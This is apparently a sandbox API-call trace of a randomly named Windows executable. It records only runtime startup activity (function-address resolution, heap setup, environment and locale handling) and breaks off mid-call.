# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 18.12.2020 22:11:10.204 Process: id = "1" image_name = "oqrosnesyxcditex.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe" page_root = "0x2867f000" os_pid = "0xa94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa90 [0055.591] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0055.592] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0055.592] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0055.592] GetProcAddress (hModule=0x76d30000, lpProcName="SetWaitableTimer") returned 0x76d6bb2f [0055.592] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0055.592] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleAliasesA") returned 0x76de6680 [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="GetVolumePathNamesForVolumeNameW") returned 0x76d50b26 [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="GetGeoInfoA") returned 0x76dd5272 [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleOutputCharacterW") returned 0x76de714f [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringA") returned 0x76d6bc39 [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0055.593] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="OpenEventW") returned 0x76d415d6 [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfoExA") returned 0x76dd5a1f [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExA") returned 0x76d68266 [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultCommConfigA") returned 0x76dc8009 [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringA") returned 0x76d43c5a [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0055.594] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoA") returned 0x76d40e00 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0055.595] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsA") returned 0x76d4e349 [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStrings") returned 0x76d4e361 [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="SetHandleCount") returned 0x76d4cb29 [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0055.596] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="HeapCreate") returned 0x76d44a2d [0055.597] GetProcAddress (hModule=0x76d30000, lpProcName="HeapDestroy") returned 0x76d435b7 [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedExchange") returned 0x76d41462 [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0055.598] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0055.599] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleA") returned 0x76d412fc [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleOutputCP") returned 0x76d59b0f [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0055.600] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0055.601] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeA") returned 0x76d68266 [0055.601] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0055.601] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatA") returned 0x76d6a842 [0055.601] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatA") returned 0x76d6a959 [0055.601] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0055.601] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesA") returned 0x76d6287b [0055.601] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0055.601] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0055.601] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0055.601] GetProcAddress (hModule=0x770a0000, lpProcName="GetCharWidthFloatA") returned 0x770d8d09 [0055.601] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x75620000 [0055.602] GetProcAddress (hModule=0x75620000, lpProcName="WinHttpCloseHandle") returned 0x75622c01 [0055.602] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0055.602] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0055.602] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xcee4bae0, dwHighDateTime=0x1d6d58a)) [0055.602] GetCurrentProcessId () returned 0xa94 [0055.602] GetCurrentThreadId () returned 0xa90 [0055.602] GetTickCount () returned 0x114937a [0055.602] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=17577609023) returned 1 [0055.602] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0055.603] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x61e0000 [0055.603] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.603] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0055.603] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0055.604] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0055.604] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0055.604] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.604] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0055.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.605] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0055.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.605] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0055.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.605] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0055.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.605] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0055.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.606] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0055.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.606] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0055.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.607] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0055.607] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x214) returned 0x61e07d0 [0055.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.607] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0055.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0055.607] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0055.607] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0055.608] GetCurrentThreadId () returned 0xa90 [0055.608] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0055.608] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x800) returned 0x61e09f0 [0055.608] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0055.608] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0055.608] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0055.608] SetHandleCount (uNumber=0x20) returned 0x20 [0055.608] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" " [0055.608] GetEnvironmentStringsW () returned 0x4a13dc8* [0055.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0055.608] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x0, Size=0x565) returned 0x61e11f8 [0055.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x61e11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0055.608] FreeEnvironmentStringsW (penv=0x4a13dc8) returned 1 [0055.609] GetLastError () returned 0x0 [0055.609] SetLastError (dwErrCode=0x0) [0055.609] GetLastError () returned 0x0 [0055.609] SetLastError (dwErrCode=0x0) [0055.609] GetLastError () returned 0x0 [0055.609] SetLastError (dwErrCode=0x0) [0055.609] GetACP () returned 0x4e4 [0055.609] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x0, Size=0x220) returned 0x61e1768 [0055.609] GetLastError () returned 0x0 [0055.609] SetLastError (dwErrCode=0x0) [0055.609] IsValidCodePage (CodePage=0x4e4) returned 1 [0055.609] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0055.609] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0055.609] GetLastError () returned 0x0 [0055.609] SetLastError (dwErrCode=0x0) [0055.609] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0055.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0055.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0055.609] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0055.609] GetLastError () returned 0x0 [0055.610] SetLastError (dwErrCode=0x0) [0055.610] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0055.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0055.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鮆웶㣓AĀ") returned 256 [0055.610] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鮆웶㣓AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0055.610] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鮆웶㣓AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0055.610] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿG\x05\x8bÙ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0055.610] GetLastError () returned 0x0 [0055.610] SetLastError (dwErrCode=0x0) [0055.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0055.610] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鮆웶㣓AĀ") returned 256 [0055.610] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" 